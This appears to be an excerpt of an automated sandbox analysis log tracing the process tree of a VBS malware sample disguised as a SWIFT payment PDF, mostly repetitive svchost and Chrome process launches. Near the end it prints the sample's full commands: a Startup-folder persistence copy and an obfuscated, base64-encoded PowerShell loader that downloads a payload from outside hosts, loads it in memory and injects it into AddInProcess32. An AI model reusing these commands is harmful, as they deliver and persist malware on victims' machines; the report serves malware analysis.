            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
